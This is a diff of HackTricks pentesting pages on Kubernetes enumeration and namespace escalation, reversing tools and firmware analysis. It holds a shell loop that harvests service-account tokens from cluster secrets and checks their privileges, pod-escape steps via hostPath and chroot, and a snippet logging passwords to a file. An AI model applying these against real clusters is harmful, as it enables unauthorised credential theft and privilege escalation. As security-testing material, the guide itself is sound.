[kubernetes-role-based-access-control-rbac.md](../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) [kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
{% endcontent-ref %} {% endcontent-ref %}
**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges: **Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
@ -215,7 +214,7 @@ You can learn more about **Kubernetes RBAC** in
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %} {% endcontent-ref %}
## Get Others roles ### Get Others roles
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -233,7 +232,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get namespaces ### Get namespaces
Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
@ -251,7 +250,7 @@ kurl -k -v https://$APISERVER/api/v1/namespaces/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get secrets ### Get secrets
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -276,7 +275,7 @@ If you can read secrets you can use the following lines to get the privileges re
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
``` ```
## Get Service Accounts ### Get Service Accounts
As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges. As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
@ -294,7 +293,7 @@ curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Deployments ### Get Deployments
The deployments specify the **components** that need to be **run**. The deployments specify the **components** that need to be **run**.
@ -313,7 +312,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Pods ### Get Pods
The Pods are the actual **containers** that will **run**. The Pods are the actual **containers** that will **run**.
@ -332,7 +331,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Services ### Get Services
Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack. Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
@ -351,7 +350,7 @@ curl -v https://$APISERVER/api/v1/namespaces/default/services/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get nodes ### Get nodes
Get all the **nodes configured inside the cluster**. Get all the **nodes configured inside the cluster**.
@ -369,7 +368,7 @@ curl -v https://$APISERVER/api/v1/nodes/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get DaemonSets ### Get DaemonSets
**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed. **DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
@ -387,7 +386,7 @@ curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get cronjob ### Get cronjob
Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action. Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
@ -405,7 +404,7 @@ curl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get "all" ### Get "all"
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -415,7 +414,7 @@ k get all
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## **Get Pods consumptions** ### **Get Pods consumptions**
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -425,7 +424,7 @@ k top pod --all-namespaces
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Escaping from the pod ### Escaping from the pod
If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes. If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
@ -480,11 +479,10 @@ chroot /root /bin/bash
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/) Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
# References ## References
{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %} {% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -500,5 +498,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Kubernetes Namespace Escalation
<details> <details>
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
Here are some techniques you can try to escape to a different namespace: Here are some techniques you can try to escape to a different namespace:
## Abuse K8s privileges ### Abuse K8s privileges
Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
@ -31,7 +30,7 @@ For more info about which privileges you can abuse read:
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %} {% endcontent-ref %}
## Escape to the node ### Escape to the node
If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
@ -41,12 +40,10 @@ If you can escape to the node either because you have compromised a pod and you
All these techniques are explained in: All these techniques are explained in:
{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} {% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %}
[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) [attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %} {% endcontent-ref %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -62,5 +59,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -36,7 +36,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
### 0- Physical Attacks ### 0- Physical Attacks
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/). Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications/).
### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) ### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
@ -146,9 +146,9 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
#### **Exploiting** #### **Exploiting**
* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/) * [**Basic Linux Exploiting**](../group-1/linux-exploiting-basic-esp/)
* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md) * [**Basic Windows Exploiting**](../group-1/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Basic exploiting tools**](../exploiting/tools/) * [**Basic exploiting tools**](../group-1/tools/)
#### [**Basic Python**](../misc/basic-python/) #### [**Basic Python**](../misc/basic-python/)

View file

@ -0,0 +1,2 @@
# Reversing & Exploiting

View file

@ -1,5 +1,7 @@
# Reversing Tools & Basic Methods # Reversing Tools & Basic Methods
## Reversing Tools & Basic Methods
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Wasm decompiler / Wat compiler
# Wasm decompiler / Wat compiler
Online: Online:
@ -30,14 +31,14 @@ Software:
* [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo) * [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo)
* [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec) * [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec)
# .Net decompiler ## .Net decompiler
[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)\ [https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)\
[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\ [ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\
If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\ If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\
You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/) You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/)
## DNSpy Logging ### DNSpy Logging
In order to make **DNSpy log some information in a file**, you could use this .Net lines: In order to make **DNSpy log some information in a file**, you could use this .Net lines:
@ -47,7 +48,7 @@ path = "C:\\inetpub\\temp\\MyTest2.txt";
File.AppendAllText(path, "Password: " + password + "\n"); File.AppendAllText(path, "Password: " + password + "\n");
``` ```
## DNSpy Debugging ### DNSpy Debugging
In order to debug code using DNSpy you need to: In order to debug code using DNSpy you need to:
@ -108,14 +109,14 @@ Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
![](<../../.gitbook/assets/image (285).png>) ![](<../../.gitbook/assets/image (285).png>)
# Java decompiler ## Java decompiler
[https://github.com/skylot/jadx](https://github.com/skylot/jadx)\ [https://github.com/skylot/jadx](https://github.com/skylot/jadx)\
[https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases) [https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases)
# Debugging DLLs ## Debugging DLLs
## Using IDA ### Using IDA
* **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe) * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
* Select **Windbg** debugger * Select **Windbg** debugger
@ -131,7 +132,7 @@ Then, when you start debugging **the execution will be stopped when each DLL is
But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how. But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how.
## Using x64dbg/x32dbg ### Using x64dbg/x32dbg
* **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe) * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
* **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain * **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
@ -144,7 +145,7 @@ Notice that when the execution is stopped by any reason in win64dbg you can see
Then, looking to this ca see when the execution was stopped in the dll you want to debug. Then, looking to this ca see when the execution was stopped in the dll you want to debug.
# GUI Apps / Videogames ## GUI Apps / Videogames
[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in: [**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in:
@ -152,13 +153,13 @@ Then, looking to this ca see when the execution was stopped in the dll you want
[cheat-engine.md](cheat-engine.md) [cheat-engine.md](cheat-engine.md)
{% endcontent-ref %} {% endcontent-ref %}
# ARM & MIPS ## ARM & MIPS
{% embed url="https://github.com/nongiach/arm_now" %} {% embed url="https://github.com/nongiach/arm_now" %}
# Shellcodes ## Shellcodes
## Debugging a shellcode with blobrunner ### Debugging a shellcode with blobrunner
[**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\ [**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\
Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode. Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode.
@ -170,7 +171,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
[blobrunner.md](blobrunner.md) [blobrunner.md](blobrunner.md)
{% endcontent-ref %} {% endcontent-ref %}
## Debugging a shellcode with jmp2it ### Debugging a shellcode with jmp2it
[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. [**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
@ -178,7 +179,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/). You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/).
## Debugging shellcode using Cutter ### Debugging shellcode using Cutter
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. [**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically.
@ -196,7 +197,7 @@ You can see the stack for example inside a hex dump:
![](<../../.gitbook/assets/image (402).png>) ![](<../../.gitbook/assets/image (402).png>)
## Deobfuscating shellcode and getting executed functions ### Deobfuscating shellcode and getting executed functions
You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\ You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory. It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
@ -216,11 +217,11 @@ scDbg also counts with a graphical launcher where you can select the options you
The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg). The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg).
## Disassembling using CyberChef ### Disassembling using CyberChef
Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\)) Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\))
# [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator) ## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
This obfuscator **modify all the instructions for `mov`**(yeah, really cool). It also uses interruptions to change executions flows. For more information about how does it works: This obfuscator **modify all the instructions for `mov`**(yeah, really cool). It also uses interruptions to change executions flows. For more information about how does it works:
@ -238,7 +239,7 @@ And [install keystone](https://github.com/keystone-engine/keystone/blob/master/d
If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
# Rust ## Rust
To find the **entry point** search the functions by `::main` like in: To find the **entry point** search the functions by `::main` like in:
@ -247,7 +248,7 @@ To find the **entry point** search the functions by `::main` like in:
In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\ In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\
Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**. Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
# **Delphi** ## **Delphi**
For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR) For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
@ -259,7 +260,7 @@ This plugin will execute the binary and resolve function names dynamically at th
It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom. It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom.
# Golang ## Golang
I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper) I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
@ -267,15 +268,15 @@ Just press **ATL+f7** (import python plugin in IDA) and select the python plugin
This will resolve the names of the functions. This will resolve the names of the functions.
# Compiled Python ## Compiled Python
In this page you can find how to get the python code from an ELF/EXE python compiled binary: In this page you can find how to get the python code from an ELF/EXE python compiled binary:
{% content-ref url="../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} {% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) [.pyc.md](../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %} {% endcontent-ref %}
# GBA - Game Body Advance ## GBA - Game Body Advance
If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it: If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it:
@ -388,11 +389,11 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/) **Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
# Game Boy ## Game Boy
{% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %} {% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %}
# Courses ## Courses
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)

View file

@ -1,4 +1,4 @@
# Firmware Analysis
<details> <details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Introduction
# Introduction
Firmware is a type of software that provides communication and control over a devices hardware components. Its the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware. Firmware is a type of software that provides communication and control over a devices hardware components. Its the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware.
@ -25,7 +24,7 @@ Devices store firmware in **nonvolatile memory**, such as ROM, EPROM, or flash m
Its important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process. Its important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process.
# **Information gathering and reconnaissance** ## **Information gathering and reconnaissance**
During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following: During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following:
@ -47,7 +46,7 @@ During this stage, collect as much information about the target as possible to u
Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmles LGTM](https://lgtm.com/#explore). Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmles LGTM](https://lgtm.com/#explore).
# Getting the Firmware ## Getting the Firmware
There are different ways with different difficulty levels to download the firmware There are different ways with different difficulty levels to download the firmware
@ -66,7 +65,7 @@ There are different ways with different difficulty levels to download the firmwa
* Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT). * Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT).
* You will need a supported chip programmer for flash storage and/or the MCU. * You will need a supported chip programmer for flash storage and/or the MCU.
# Analyzing the firmware ## Analyzing the firmware
Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that: Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that:
@ -83,18 +82,18 @@ If you don't find much with those tools check the **entropy** of the image with
Moreover, you can use these tools to extract **files embedded inside the firmware**: Moreover, you can use these tools to extract **files embedded inside the firmware**:
{% content-ref url="../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} {% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) [file-data-carving-recovery-tools.md](../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
{% endcontent-ref %} {% endcontent-ref %}
Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file. Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file.
## Getting the Filesystem ### Getting the Filesystem
With the previous commented tools like `binwalk -ev <bin>` you should have been able to **extract the filesystem**.\ With the previous commented tools like `binwalk -ev <bin>` you should have been able to **extract the filesystem**.\
Binwalk usually extracts it inside a **folder named as the filesystem type**, which usually is one of the following: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs. Binwalk usually extracts it inside a **folder named as the filesystem type**, which usually is one of the following: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs.
### Manual Filesystem Extraction #### Manual Filesystem Extraction
Sometimes, binwalk will **not have the magic byte of the filesystem in its signatures**. In these cases, use binwalk to **find the offset of the filesystem and carve the compressed filesystem** from the binary and **manually extract** the filesystem according to its type using the steps below. Sometimes, binwalk will **not have the magic byte of the filesystem in its signatures**. In these cases, use binwalk to **find the offset of the filesystem and carve the compressed filesystem** from the binary and **manually extract** the filesystem according to its type using the steps below.
@ -146,7 +145,7 @@ Files will be in "`squashfs-root`" directory afterwards.
`$ ubidump.py <bin>` `$ ubidump.py <bin>`
## Analyzing the Filesystem ### Analyzing the Filesystem
Now that you have the filesystem is time to start looking for bad practices such as: Now that you have the filesystem is time to start looking for bad practices such as:
@ -199,7 +198,7 @@ Inside the filesystem you can also find **source code** of programs (that you sh
Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity). Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity).
{% endhint %} {% endhint %}
# Emulating Firmware ## Emulating Firmware
The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**. The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**.
@ -207,11 +206,11 @@ The idea to emulate the Firmware is to be able to perform a **dynamic analysis**
At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target. At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target.
{% endhint %} {% endhint %}
## Binary Emulation ### Binary Emulation
If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled. If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled.
### MIPS example #### MIPS example
```bash ```bash
file ./squashfs-root/bin/busybox file ./squashfs-root/bin/busybox
@ -231,7 +230,7 @@ qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/ls
100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0 100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0
``` ```
### ARM Example #### ARM Example
```bash ```bash
